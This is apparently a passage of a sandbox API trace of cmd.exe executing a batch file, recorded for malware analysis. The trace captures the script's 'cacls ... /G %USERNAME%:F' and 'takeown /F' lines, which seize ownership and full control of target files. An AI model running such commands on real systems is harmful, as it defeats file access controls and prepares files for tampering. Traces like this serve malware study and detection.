[0199.503] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0199.503] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0199.503] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0199.503] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0199.503] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0199.504] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0199.504] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0199.504] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0199.504] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0199.504] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0199.504] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0199.504] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0199.504] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0199.504] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0199.504] GetProcessHeap () returned 0x350000 [0199.504] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x210) returned 0x363288 [0199.504] GetProcessHeap () returned 0x350000 [0199.504] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xf4) returned 0x3634a0 [0199.507] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0199.508] GetProcessHeap () returned 0x350000 [0199.508] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x418) returned 0x3507f0 [0199.508] SetErrorMode (uMode=0x0) returned 0x0 [0199.508] SetErrorMode (uMode=0x1) returned 0x0 [0199.508] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x3507f8, lpFilePart=0x34f520 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34f520*="Desktop") returned 0x25 [0199.508] SetErrorMode (uMode=0x0) returned 0x1 [0199.508] GetProcessHeap () returned 0x350000 [0199.508] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x3507f0, Size=0x6e) returned 0x3507f0 [0199.509] GetProcessHeap () returned 0x350000 [0199.509] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3507f0) returned 0x6e [0199.509] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0199.509] GetProcessHeap () returned 0x350000 [0199.509] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x5a) returned 0x3635a0 [0199.509] GetProcessHeap () returned 0x350000 [0199.509] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xa8) returned 0x363608 [0199.509] GetProcessHeap () returned 0x350000 [0199.509] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x363608, Size=0x5a) returned 0x363608 [0199.509] GetProcessHeap () returned 0x350000 [0199.510] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x363608) returned 0x5a [0199.510] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0199.510] GetProcessHeap () returned 0x350000 [0199.510] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xe0) returned 0x350868 [0199.519] GetProcessHeap () returned 0x350000 [0199.519] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x350868, Size=0x76) returned 0x350868 [0199.519] GetProcessHeap () returned 0x350000 [0199.519] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x350868) returned 0x76 [0199.519] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.519] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x34f2bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34f2bc) returned 0x363670 [0199.520] GetProcessHeap () returned 0x350000 [0199.520] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x14) returned 0x361818 [0199.520] FindClose (in: hFindFile=0x363670 | out: hFindFile=0x363670) returned 1 [0199.520] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0199.520] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0199.520] GetConsoleTitleW (in: lpConsoleTitle=0x34f794, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.520] GetProcessHeap () returned 0x350000 [0199.520] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x11c) returned 0x3508e8 [0199.521] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0199.521] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0199.521] IdentifyCodeAuthzLevelW () returned 0x1 [0199.529] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0199.529] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0199.530] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0199.530] CloseCodeAuthzLevel () returned 0x1 [0199.530] SetErrorMode (uMode=0x0) returned 0x0 [0199.530] SetErrorMode (uMode=0x1) returned 0x0 [0199.530] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x363290, lpFilePart=0x34f680 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x34f680*="Ch81ANBE.bat") returned 0x32 [0199.530] SetErrorMode (uMode=0x0) returned 0x1 [0199.530] GetProcessHeap () returned 0x350000 [0199.530] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x72) returned 0x372bd0 [0199.530] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\"", _Control=" \x09") returned 0x1 [0199.530] GetProcessHeap () returned 0x350000 [0199.530] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x88) returned 0x3511b8 [0199.531] GetProcessHeap () returned 0x350000 [0199.531] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x108) returned 0x374b38 [0199.531] GetProcessHeap () returned 0x350000 [0199.531] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x374b38, Size=0x8a) returned 0x374b38 [0199.531] GetProcessHeap () returned 0x350000 [0199.531] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x374b38) returned 0x8a [0199.531] CmdBatNotification () returned 0x3632f2 [0199.531] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x34f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0199.532] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0199.532] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.532] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.532] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.532] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.532] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x34f6a8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x34f6a8*=0xe2, lpOverlapped=0x0) returned 1 [0199.533] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0199.533] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0199.536] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.536] GetFileType (hFile=0x78) returned 0x1 [0199.536] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.536] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0199.536] GetProcessHeap () returned 0x350000 [0199.536] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400a) returned 0x366b00 [0199.536] GetProcessHeap () returned 0x350000 [0199.536] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x4008) returned 0x374bd0 [0199.537] GetProcessHeap () returned 0x350000 [0199.537] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x1a) returned 0x365850 [0199.537] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0199.537] GetProcessHeap () returned 0x350000 [0199.537] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x365850 | out: hHeap=0x350000) returned 1 [0199.537] GetProcessHeap () returned 0x350000 [0199.537] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x374bd0 | out: hHeap=0x350000) returned 1 [0199.837] GetProcessHeap () returned 0x350000 [0199.837] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x366b00 | out: hHeap=0x350000) returned 1 [0199.837] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0199.838] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0199.838] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0199.838] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0199.838] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0199.838] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0199.838] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0199.838] GetProcessHeap () returned 0x350000 [0199.838] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x58) returned 0x351248 [0199.838] GetProcessHeap () returned 0x350000 [0199.838] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x14) returned 0x3512a8 [0199.843] GetProcessHeap () returned 0x350000 [0199.843] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xca) returned 0x3641a0 [0199.845] _tell (_FileHandle=3) returned 32 [0199.845] _close (_FileHandle=3) returned 0 [0199.845] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x34f47c | out: _Buffer="\r\n") returned 2 [0199.846] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.846] GetFileType (hFile=0x7) returned 0x2 [0199.847] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0199.847] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f43c | out: lpMode=0x34f43c) returned 1 [0199.847] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.847] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x34f468, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f468*=0x2) returned 1 [0199.848] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0199.848] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0199.848] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x34f478 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0199.848] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x34f478 | out: _Buffer=">") returned 1 [0199.848] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.848] GetFileType (hFile=0x7) returned 0x2 [0199.848] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0199.849] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f440 | out: lpMode=0x34f440) returned 1 [0199.849] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.849] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x34f46c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x34f46c*=0x26) returned 1 [0199.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.850] GetFileType (hFile=0x7) returned 0x2 [0199.850] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0199.850] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6c4 | out: lpMode=0x34f6c4) returned 1 [0199.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.851] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3512b0*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x34f6f0, lpReserved=0x0 | out: lpBuffer=0x3512b0*, lpNumberOfCharsWritten=0x34f6f0*=0x5) returned 1 [0199.851] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x34f6fc | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 97 [0199.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.851] GetFileType (hFile=0x7) returned 0x2 [0199.852] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0199.852] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6bc | out: lpMode=0x34f6bc) returned 1 [0199.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.852] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x61, lpNumberOfCharsWritten=0x34f6e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f6e8*=0x61) returned 1 [0199.852] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x34f71c | out: _Buffer="\r\n") returned 2 [0199.853] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.853] GetFileType (hFile=0x7) returned 0x2 [0199.853] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0199.853] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6dc | out: lpMode=0x34f6dc) returned 1 [0199.853] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.853] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x34f708, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f708*=0x2) returned 1 [0199.854] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0199.854] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0199.854] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0199.854] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0199.854] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0199.854] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0199.854] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0199.854] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0199.854] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0199.854] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0199.854] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0199.854] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0199.854] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0199.854] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0199.855] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0199.855] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0199.855] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0199.855] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0199.855] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0199.855] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0199.855] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0199.855] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0199.855] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0199.855] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0199.855] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0199.855] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0199.855] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0199.855] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0199.855] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0199.855] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0199.855] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0199.855] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0199.855] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0199.855] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0199.855] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0199.855] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0199.855] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0199.855] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0199.856] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0199.856] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0199.856] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0199.856] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0199.856] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0199.856] GetProcessHeap () returned 0x350000 [0199.856] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x418) returned 0x364278 [0199.856] SetErrorMode (uMode=0x0) returned 0x0 [0199.857] SetErrorMode (uMode=0x1) returned 0x0 [0199.857] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x364280, lpFilePart=0x34f4c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34f4c0*="Desktop") returned 0x25 [0199.857] SetErrorMode (uMode=0x0) returned 0x1 [0199.857] GetProcessHeap () returned 0x350000 [0199.857] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x364278, Size=0x60) returned 0x364278 [0199.857] GetProcessHeap () returned 0x350000 [0199.857] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364278) returned 0x60 [0199.857] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0199.857] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0199.857] GetProcessHeap () returned 0x350000 [0199.857] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x120) returned 0x3642e0 [0199.857] GetProcessHeap () returned 0x350000 [0199.857] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x238) returned 0x364408 [0199.862] GetConsoleTitleW (in: lpConsoleTitle=0x34f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.864] GetConsoleTitleW (in: lpConsoleTitle=0x34f020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.864] InitializeProcThreadAttributeList (in: lpAttributeList=0x34eea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x34ef70 | out: lpAttributeList=0x34eea8, lpSize=0x34ef70) returned 1 [0199.864] UpdateProcThreadAttribute (in: lpAttributeList=0x34eea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x34ef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x34eea8, lpPreviousValue=0x0) returned 1 [0199.864] GetStartupInfoW (in: lpStartupInfo=0x34ee64 | out: lpStartupInfo=0x34ee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0200.061] CloseHandle (hObject=0x78) returned 1 [0200.061] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0200.062] GetProcessHeap () returned 0x350000 [0200.062] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x365fc0 | out: hHeap=0x350000) returned 1 [0200.062] GetEnvironmentStringsW () returned 0x365fc0* [0200.062] GetProcessHeap () returned 0x350000 [0200.062] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb36) returned 0x366b00 [0200.062] FreeEnvironmentStringsW (penv=0x365fc0) returned 1 [0200.062] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0214.348] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x34ee44 | out: lpExitCode=0x34ee44*=0x1f57) returned 1 [0214.348] CloseHandle (hObject=0x74) returned 1 [0214.348] _vsnwprintf (in: _Buffer=0x34ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x34ee50 | out: _Buffer="00001F57") returned 8 [0214.348] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0214.348] GetProcessHeap () returned 0x350000 [0214.348] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x366b00 | out: hHeap=0x350000) returned 1 [0214.349] GetEnvironmentStringsW () returned 0x365fc0* [0214.349] GetProcessHeap () returned 0x350000 [0214.349] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb5c) returned 0x3681a8 [0214.349] FreeEnvironmentStringsW (penv=0x365fc0) returned 1 [0214.349] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.349] GetProcessHeap () returned 0x350000 [0214.349] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3681a8 | out: hHeap=0x350000) returned 1 [0214.349] GetEnvironmentStringsW () returned 0x365fc0* [0214.349] GetProcessHeap () returned 0x350000 [0214.349] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb5c) returned 0x3681a8 [0214.349] FreeEnvironmentStringsW (penv=0x365fc0) returned 1 [0214.349] GetProcessHeap () returned 0x350000 [0214.349] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x350000) returned 1 [0214.349] DeleteProcThreadAttributeList (in: lpAttributeList=0x34eea8 | out: lpAttributeList=0x34eea8) [0214.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.349] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.350] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0214.350] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.350] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0214.351] SetConsoleInputExeNameW () returned 0x1 [0214.351] GetConsoleOutputCP () returned 0x1b5 [0214.351] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0214.351] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.351] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x34f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0214.352] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0214.352] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.352] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0214.352] GetProcessHeap () returned 0x350000 [0214.352] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364b70 | out: hHeap=0x350000) returned 1 [0214.352] GetProcessHeap () returned 0x350000 [0214.352] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364a40 | out: hHeap=0x350000) returned 1 [0214.352] GetProcessHeap () returned 0x350000 [0214.352] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364918 | out: hHeap=0x350000) returned 1 [0214.352] GetProcessHeap () returned 0x350000 [0214.352] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3648b0 | out: hHeap=0x350000) returned 1 [0214.352] GetProcessHeap () returned 0x350000 [0214.352] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3647d0 | out: hHeap=0x350000) returned 1 [0214.352] GetProcessHeap () returned 0x350000 [0214.353] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3645b8 | out: hHeap=0x350000) returned 1 [0214.353] GetProcessHeap () returned 0x350000 [0214.353] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364538 | out: hHeap=0x350000) returned 1 [0214.353] GetProcessHeap () returned 0x350000 [0214.353] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364408 | out: hHeap=0x350000) returned 1 [0214.353] GetProcessHeap () returned 0x350000 [0214.353] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3642e0 | out: hHeap=0x350000) returned 1 [0214.353] GetProcessHeap () returned 0x350000 [0214.353] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364278 | out: hHeap=0x350000) returned 1 [0214.353] GetProcessHeap () returned 0x350000 [0214.353] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3641a0 | out: hHeap=0x350000) returned 1 [0214.353] GetProcessHeap () returned 0x350000 [0214.353] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3512a8 | out: hHeap=0x350000) returned 1 [0214.353] GetProcessHeap () returned 0x350000 [0214.353] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x351248 | out: hHeap=0x350000) returned 1 [0214.353] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.353] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0214.353] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x34f6a8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x34f6a8*=0xc2, lpOverlapped=0x0) returned 1 [0214.354] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0214.354] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0214.355] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.355] GetFileType (hFile=0x74) returned 0x1 [0214.355] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.355] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0214.355] GetProcessHeap () returned 0x350000 [0214.355] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400a) 